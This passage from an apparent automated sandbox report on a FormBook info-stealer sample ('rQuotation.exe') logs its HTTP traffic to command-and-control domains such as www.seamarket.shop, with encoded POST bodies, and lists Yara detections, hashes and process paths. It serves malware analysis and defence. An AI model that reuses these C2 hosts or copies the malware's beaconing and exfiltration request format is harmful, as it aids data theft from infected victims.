                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 35 52 6f 6d 78 7a 6a 46 57 4b 4e 38 55 4e 6a 42 56 72 34 51 30 78 31 48 79 6e 6c 76 66 38 2b 79 63 2b 2b 70 59 59 4f 6a 50 30 72 54 54 33 56 47 64 6f 7a 75 72 4c 4e 34 61 6a 73 44 6e 59 79 41 5a 53 6e 4b 44 36 78 63 67 76 35 6d 4b 46 6b 6c 78 2b 77 63 59 6a 35 52 38 2b 34 43 32 6b 75 65 43 47 65 37 4c 62 44 53 34 77 32 6d 48 64 34 72 78 4f 47 44 63 64 59 2f 73 4b 76 76 4c 44 57 52 74 36 6e 53 47 75 39 49 45 55 6b 42 65 78 58 68 6d 4b 65 71 4d 2f 75 48 59 43 6a 46 33 66 6c 58 53 30 6b 59 30 2b 47 38 33 4c 54 48 58 66 50 6a 43 75 30 37 66 44 62 70 2b 59 37 46 53 42 6f 34 67 34 49 71 68 66 58 49 77 61 7a 6b 62 46 61 47 45 53 34 68 78 50 34 63 73 50 79 78 64 76 6b 71 6f 76 42 39 52 65 66 5a 71 6d 31 50 36 35 32 45 37 74 63 4d 30 31 58 51 69 64 7a 48 7a 78 69 34 54 38 73 31 47 58 70 33 56 6c 7a 57 50 66 59 2b 53 4c 53 68 69 74 77 71 4b 2b 36 46 31 6a 51 39 77 33 6b 4f 64 56 54 64 62 33 45 6c 31 58 35 77 6f 79 77 2b 6e 56 70 6e 50 4d 41 37 43 61 32 50 4d 43 74 6f 59 47 52 68 44 49 73 6c 6f 69 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 4v7=5RomxzjFWKN8UNjBVr4Q0x1Hynlvf8+yc++pYYOjP0rTT3VGdozurLN4ajsDnYyAZSnKD6xcgv5mKFklx+wcYj5R8+4C2kueCGe7LbDS4w2mHd4rxOGDcdY/sKvvLDWRt6nSGu9IEUkBexXhmKeqM/uHYCjF3flXS0kY0+G83LTHXfPjCu07fDbp+Y7FSBo4g4IqhfXIwazkbFaGES4hxP4csPyxdvkqovB9RefZqm1P652E7tcM01XQidzHzxi4T8s1GXp3VlzWPfY+SLShitwqK+6F1jQ9w3kOdVTdb3El1X5woyw+nVpnPMA7Ca2PMCtoYGRhDIsloi0aWy4hBkRHvnHQrV9tMQ80F1KzGML+BiOzNHOc6mz1wlVbU3lExr7bp42qUulQfPLJ3sHZxL0bn1RG/F+iuBJM8BarKKEt7QeK7S1bZ9TI1WGFvsI029ybiXjZGxsCGmJiCnt9PmpNWOY1nJDByINlSn4BD4ENKukbZMSmZMrXcslLH175ImlpR1hUhtNl4O/zagrUUZZrPyn9nVhVgkA2i5gPBWaO9RckFVZJLE0lvlzXIj9IXzeEFxduCOCv5/RVY4P+6CCSDV0l97NxRgqeX1C642nT4T2hLiBE330aAZ6hg9UMoaWJjZVr8/E7xkuCW4LbQYYM71sdE2WA4KAA2In3LSxa/azNaMqRoU37rvhfnwLR1WtptrzOIB/5l7rMWveGRUSIe3lvqQ8qUzwQcrjW2xZcxl8dY1Q6uxrEX/B2O+H2G5perMuxGSYuj+4Ndia/i7Fo59/eW6IgaL6kuys6Z7VwtahjHqOwgbUM5Uo9wXZpOeYeuXCmDEBYIkv8o2CQCxaWvxq2va2gsZzsR4E9WJULulJDW2FzsIJvF0Jf/MncaUxjPDcSCwTKLNW710IQZDaW+BjGQ+7p0GdWmeJne5tBynH32kQto/k3W+stzWyg4AT56+j74HPGR2eLOjNmQ5Jwe7dTpPo6wHax5tDz9qVtEalw [TRUNCATED]
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:10.522846937 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              content-length: 1251
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:10:10 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:10.522866011 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                                                                                                                                                                              Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              28192.168.2.450030185.68.108.243804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:11.907931089 CET427OUTGET /45u5/?pRel=chN0&4v7=0TAGyGi/QqAief36fqQZkTt5+nwNOdjQfsW4ILLFJiz2YBVGcbvNqcBGTGc+pdHcbXHcTIwSr9BXUFYIju8DT0Mq2PAg2Di4D0yPeZ6V6HqzRoZnxJ6cd60= HTTP/1.1
                                                                                                                                                                                                                                              Host: www.accusolution.pro
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:13.179289103 CET1236INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                                                                                                                                              pragma: no-cache
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              content-length: 1251
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:10:12 GMT
                                                                                                                                                                                                                                              server: LiteSpeed
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:13.179306030 CET253INData Raw: 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76
                                                                                                                                                                                                                                              Data Ascii: 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by LiteSpeed Web Server<p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></bod


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              29192.168.2.45003152.223.13.41804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:19.468746901 CET695OUTPOST /zsuo/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.seamarket.shop
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.seamarket.shop
                                                                                                                                                                                                                                              Referer: http://www.seamarket.shop/zsuo/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 200
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 56 43 49 41 38 54 30 39 36 6d 53 4f 6e 32 7a 32 76 57 4c 63 6a 65 53 30 4d 5a 73 41 5a 4e 6b 64 63 54 4c 42 78 32 61 48 6e 55 55 57 63 41 70 6c 61 47 6d 5a 4b 65 67 42 46 6e 70 63 76 7a 69 6e 36 6e 47 46 5a 46 51 72 44 46 70 51 4f 63 69 7a 78 71 70 52 53 32 56 58 77 77 62 74 79 53 71 37 32 46 30 6a 45 68 65 6b 52 64 71 73 6a 69 41 51 37 41 4e 7a 48 7a 6d 6e 6c 67 6f 71 35 56 37 55 38 4d 52 77 66 6e 4b 39 2b 68 64 61 37 33 6a 76 7a 6d 59 68 46 7a 33 62 33 4b 62 38 6f 70 62 4f 37 30 6d 4c 79 54 49 70 57 56 71 72 35 41 4c 74 48 47 6f 47 58 33 39 58 4e 53 56 4d 30 35 78 35 74 41 3d 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=VCIA8T096mSOn2z2vWLcjeS0MZsAZNkdcTLBx2aHnUUWcAplaGmZKegBFnpcvzin6nGFZFQrDFpQOcizxqpRS2VXwwbtySq72F0jEhekRdqsjiAQ7ANzHzmnlgoq5V7U8MRwfnK9+hda73jvzmYhFz3b3Kb8opbO70mLyTIpWVqr5ALtHGoGX39XNSVM05x5tA==
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:20.552644968 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                              content-length: 0
                                                                                                                                                                                                                                              connection: close


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              30192.168.2.45003252.223.13.41804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:22.130280972 CET715OUTPOST /zsuo/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.seamarket.shop
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.seamarket.shop
                                                                                                                                                                                                                                              Referer: http://www.seamarket.shop/zsuo/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 220
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 56 43 49 41 38 54 30 39 36 6d 53 4f 6d 57 6a 32 38 68 66 63 71 65 53 7a 4a 5a 73 41 54 74 6b 6e 63 54 48 42 78 31 57 70 6e 6d 41 57 64 6b 74 6c 62 48 6d 5a 4e 65 67 42 50 48 70 64 68 54 69 35 36 6e 4b 4e 5a 48 55 72 44 46 74 51 4f 64 53 7a 77 5a 42 53 53 6d 56 52 34 51 62 76 38 79 71 37 32 46 30 6a 45 68 4b 4f 52 64 79 73 2f 44 77 51 70 79 70 38 5a 6a 6d 6b 74 41 6f 71 75 46 36 66 38 4d 52 6f 66 6a 44 59 2b 69 6c 61 37 32 7a 76 7a 30 67 6d 4d 7a 33 5a 36 71 61 46 35 6f 44 48 38 46 72 49 36 31 49 55 62 45 2f 50 34 47 47 33 57 33 4a 52 46 33 5a 6b 51 56 63 34 35 36 4d 77 32 4a 67 62 4d 58 30 4b 56 65 44 6b 56 4f 45 6c 49 66 6c 58 51 30 34 3d
                                                                                                                                                                                                                                              Data Ascii: 4v7=VCIA8T096mSOmWj28hfcqeSzJZsATtkncTHBx1WpnmAWdktlbHmZNegBPHpdhTi56nKNZHUrDFtQOdSzwZBSSmVR4Qbv8yq72F0jEhKORdys/DwQpyp8ZjmktAoquF6f8MRofjDY+ila72zvz0gmMz3Z6qaF5oDH8FrI61IUbE/P4GG3W3JRF3ZkQVc456Mw2JgbMX0KVeDkVOElIflXQ04=
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:23.216377974 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                              content-length: 0
                                                                                                                                                                                                                                              connection: close


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                              31192.168.2.45003352.223.13.41804960C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:24.788057089 CET10797OUTPOST /zsuo/ HTTP/1.1
                                                                                                                                                                                                                                              Host: www.seamarket.shop
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                              Origin: http://www.seamarket.shop
                                                                                                                                                                                                                                              Referer: http://www.seamarket.shop/zsuo/
                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                              Content-Length: 10300
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Data Raw: 34 76 37 3d 56 43 49 41 38 54 30 39 36 6d 53 4f 6d 57 6a 32 38 68 66 63 71 65 53 7a 4a 5a 73 41 54 74 6b 6e 63 54 48 42 78 31 57 70 6e 6d 34 57 63 58 6c 6c 55 41 79 5a 4d 65 67 42 4a 33 70 59 68 54 6a 38 36 6e 43 33 5a 48 59 56 44 48 46 51 49 2f 61 7a 35 49 42 53 59 6d 56 52 30 77 62 69 79 53 71 55 32 42 51 6e 45 68 61 4f 52 64 79 73 2f 41 59 51 35 77 4e 38 62 6a 6d 6e 6c 67 6f 50 35 56 36 33 38 4d 4a 57 66 6a 48 69 39 53 46 61 37 57 44 76 77 48 59 6d 4e 54 33 66 35 71 61 30 35 6f 2b 66 38 42 4c 69 36 31 55 36 62 45 4c 50 35 53 58 30 44 7a 46 49 51 47 38 38 53 6b 67 66 67 36 64 7a 2f 35 77 7a 43 47 6b 41 50 73 50 6f 53 4e 6c 57 61 75 68 50 46 45 5a 43 30 73 58 52 6e 32 6e 6c 78 49 5a 2f 62 36 54 4e 4f 42 33 53 55 45 32 5a 67 69 4e 5a 67 70 34 62 48 75 2f 4e 31 58 6f 4c 76 6b 35 6c 7a 75 64 56 46 4b 4f 75 7a 33 36 49 6a 64 64 65 58 50 46 48 36 31 69 4b 6a 67 75 4b 51 6b 48 41 76 6f 74 47 41 71 57 31 62 75 33 68 6b 6b 31 64 57 35 51 2f 34 69 43 33 4b 39 2f 4c 34 51 4d 2f 34 43 70 35 51 63 31 7a 7a 62 [TRUNCATED]
                                                                                                                                                                                                                                              Data Ascii: 4v7=VCIA8T096mSOmWj28hfcqeSzJZsATtkncTHBx1Wpnm4WcXllUAyZMegBJ3pYhTj86nC3ZHYVDHFQI/az5IBSYmVR0wbiySqU2BQnEhaORdys/AYQ5wN8bjmnlgoP5V638MJWfjHi9SFa7WDvwHYmNT3f5qa05o+f8BLi61U6bELP5SX0DzFIQG88Skgfg6dz/5wzCGkAPsPoSNlWauhPFEZC0sXRn2nlxIZ/b6TNOB3SUE2ZgiNZgp4bHu/N1XoLvk5lzudVFKOuz36IjddeXPFH61iKjguKQkHAvotGAqW1bu3hkk1dW5Q/4iC3K9/L4QM/4Cp5Qc1zzb8eec9ZEUsrxhRh+YrCYMcu46NM8EyuB8D0IO3YzGoOWZyoQZjyoHu1Dzjh9+treVypaCjWMYQmnkQuj3LhLXGRmOobv8pi3j2pjaCi3KxspTl3B1OiayXrVHj9EWtKQXETYwr3Z+2ngKBCHcFN/V99IvOh0LHsIr+uo1bGbW/H2DDeEsoZkZREvXkR1+BYTgIIKdxM1sOLUGIu8+wy/gK/Kyq2H+sjJ5+alprJLrRIKcBR5JsN3+BOI9ZN+gw9UXO6AE198vOBOjrvxW0sYGXgRYHMubtu32C6DBu4+94w8ndUoq2pw+ayBXSzoGsyK8JRfse7q8JDBQEuTl5z60BYPJzIDSto5Oo800MFoBdrZwU6kEQeVGRbpb3fCkF5/WE0836R5IDCTTYthFz+N96L+7gPY71RThD5NWvFOnKBRFxwIhy55xE/sZ5eXob5tD2xAdYYHdkGS1d2Xc/4RMqQbMPtvLZJhHL25gVu5L/rGuNsSHAL2I+bLisgcYXKfR3egUqMktIhl3Y0WaD83o8bek7DB6MPn1eRff60aM9Z+vnt3wDvSv38WZAytwXJ4EViuOQbdmbB/1frvBtjFgCLGQ6VpzcQVvNQyUrjCBeDhKxZiSCfuQFxw/X0tPFv1aPZcWLrkqak6EdN8wvBhUerp7dKBMpStlh5 [TRUNCATED]
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:25.875653982 CET73INHTTP/1.1 405 Method Not Allowed
                                                                                                                                                                                                                                              content-length: 0
                                                                                                                                                                                                                                              connection: close


                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                              32192.168.2.45003452.223.13.4180
                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:27.719974995 CET425OUTGET /zsuo/?4v7=YAgg/ldayhOHmzfsjWLXvaG7J5REZu11MAD7iHXRrkYiTwNIRlKLNa8zNDpduzX56xW5NVkmDFlOQcyvict8ZBdH6DXl406L+zQHeArrLeiD5GII5G18dkg=&pRel=chN0 HTTP/1.1
                                                                                                                                                                                                                                              Host: www.seamarket.shop
                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                                                                                                                                                                              Accept-Language: en-US,en
                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows; U; en-US) AppleWebKit/533.19.4 (KHTML, like Gecko) AdobeAIR/18.0
                                                                                                                                                                                                                                              Dec 23, 2024 04:10:28.813452005 CET370INHTTP/1.1 200 OK
                                                                                                                                                                                                                                              content-type: text/html
                                                                                                                                                                                                                                              date: Mon, 23 Dec 2024 03:10:28 GMT
                                                                                                                                                                                                                                              content-length: 249
                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 34 76 37 3d 59 41 67 67 2f 6c 64 61 79 68 4f 48 6d 7a 66 73 6a 57 4c 58 76 61 47 37 4a 35 52 45 5a 75 31 31 4d 41 44 37 69 48 58 52 72 6b 59 69 54 77 4e 49 52 6c 4b 4c 4e 61 38 7a 4e 44 70 64 75 7a 58 35 36 78 57 35 4e 56 6b 6d 44 46 6c 4f 51 63 79 76 69 63 74 38 5a 42 64 48 36 44 58 6c 34 30 36 4c 2b 7a 51 48 65 41 72 72 4c 65 69 44 35 47 49 49 35 47 31 38 64 6b 67 3d 26 70 52 65 6c 3d 63 68 4e 30 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?4v7=YAgg/ldayhOHmzfsjWLXvaG7J5REZu11MAD7iHXRrkYiTwNIRlKLNa8zNDpduzX56xW5NVkmDFlOQcyvict8ZBdH6DXl406L+zQHeArrLeiD5GII5G18dkg=&pRel=chN0"}</script></head></html>


                                                                                                                                                                                                                                              Statistics

                                                                                                                                                                                                                                              CPU Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Memory Usage

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              Behavior

                                                                                                                                                                                                                                              Click to jump to process

                                                                                                                                                                                                                                              System Behavior

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:22:07:21
                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\rQuotation.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\rQuotation.exe"
                                                                                                                                                                                                                                              Imagebase:0x840000
                                                                                                                                                                                                                                              File size:289'280 bytes
                                                                                                                                                                                                                                              MD5 hash:D5828DCADC44BCDB74450E5A47118E5E
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2022208730.0000000001520000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2021797759.0000000000841000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.2022713393.0000000001AE0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:22:07:43
                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                              Path:C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Program Files (x86)\OYGWkwArQApmkzwERJROZAcDAijDvuYjSVvoTqgrGgH\gAmAZOKQyy.exe"
                                                                                                                                                                                                                                              Imagebase:0xb90000
                                                                                                                                                                                                                                              File size:140'800 bytes
                                                                                                                                                                                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.3573072552.0000000002EA0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              General

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:22:07:45
                                                                                                                                                                                                                                              Start date:22/12/2024
                                                                                                                                                                                                                                              Path:C:\Windows\SysWOW64\NETSTAT.EXE
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Windows\SysWOW64\NETSTAT.EXE"
                                                                                                                                                                                                                                              Imagebase:0x740000
                                                                                                                                                                                                                                              File size:32'768 bytes
                                                                                                                                                                                                                                              MD5 hash:9DB170ED520A6DD57B5AC92EC537368A
                                                                                                                                                                                                                                              Has elevated privileges:false
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
